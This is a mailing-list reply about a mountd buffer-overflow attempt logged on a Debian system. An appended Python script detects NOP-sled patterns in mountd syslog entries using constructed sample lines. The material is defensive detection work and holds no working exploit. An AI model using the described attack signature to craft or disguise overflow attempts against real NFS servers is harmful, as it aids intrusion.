Re: Possible NFS/mountd compromise?
Ben Pfaff wrote:
> [CC:'s are appreciated; I am not subscribed to debian-user. Thanks!]
>
> I got the following logged in my /var/log/syslog today. It looks to me
> like a buffer overflow attack of some kind (character ? is `no
> operation' in x86 assembly language). Does anyone know of a
> vulnerability in mountd to this sort of thing?
Yes, this particular exploit has to be the most-tried on the net right now.
I've had it tried against my system no fewer than 8 times in the past 2
months.
Current versions of Debian are not vulnerable. It's a buffer overrun exploit
leading to root shell, I think.
It's worth informing the admins of this box that their box has been cracked
and is being used as a platform to attack others. It's also worthwhile
informing their ISP about this in case this is the cracker's actual home
machine.
--
see shy jo
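A defender-side check for the pattern discussed in this thread (a mountd "mount" request whose path is really a NOP sled plus payload, which syslogd renders as a long run of `?` because the bytes are not printable), added here as an example and not part of the original thread. The log lines, hostnames and IP addresses it scans are constructed, and the path-length and run-length thresholds are assumptions.

```python
import re
from collections import Counter

# Constructed sample syslog lines (not the log from the original post).
# The long run of '?' stands for bytes syslogd could not print, which is
# how a NOP sled shows up in a text log; the IPs are documentation ranges.
SAMPLE_LOG = [
    "Jan 31 18:26:41 host mountd[355]: NFS mount of /home attempted from 192.0.2.10",
    "Jan 31 18:26:41 host mountd[355]: NFS mount of " + "?" * 300 + "3\u00db3\u00c0"
    + " attempted from 203.0.113.5",
    "Jan 31 18:26:41 host syslogd: Cannot glue message parts together",
    "Jan 31 18:26:41 host mountd[355]: Blocked attempt of 203.0.113.5 to mount " + "?" * 300,
    "Jan 31 18:26:42 host mountd[355]: NFS mount of /export/data attempted from 192.0.2.11",
]

# Matches the two mountd message shapes seen in the thread (path + source IP).
MOUNT_RE = re.compile(
    r"mountd\[\d+\]: (?:NFS mount of (?P<path1>.*) attempted from (?P<ip1>[\d.]+)"
    r"|Blocked attempt of (?P<ip2>[\d.]+) to mount (?P<path2>.*))$"
)

MAX_SANE_PATH = 255  # assumption: longer than any real export path
MIN_SLED_RUN = 32    # assumption: no real path has this many unprintable bytes


def looks_like_overflow(path):
    """Heuristic: a path far longer than a real export, a long run of
    unprintable bytes ('?'), or any remaining non-ASCII/control byte."""
    if len(path) > MAX_SANE_PATH:
        return True
    if "?" * MIN_SLED_RUN in path:
        return True
    return any(ord(c) < 32 or ord(c) > 126 for c in path)


def find_overflow_attempts(lines):
    """Return {source_ip: count} for mountd requests whose 'path' looks
    like an overflow payload rather than an export path."""
    hits = Counter()
    for line in lines:
        m = MOUNT_RE.search(line)
        if not m:
            continue
        path = m.group("path1") or m.group("path2") or ""
        ip = m.group("ip1") or m.group("ip2")
        if looks_like_overflow(path):
            hits[ip] += 1
    return dict(hits)


if __name__ == "__main__":
    for ip, n in find_overflow_attempts(SAMPLE_LOG).items():
        print(f"{ip}: {n} suspicious mount request(s)")  # 203.0.113.5: 2
```

The returned IPs are the ones worth reporting to the owning admins and ISP, as suggested above; the two syslogd "Cannot glue" lines are a second signal that a single message exceeded what syslogd could log.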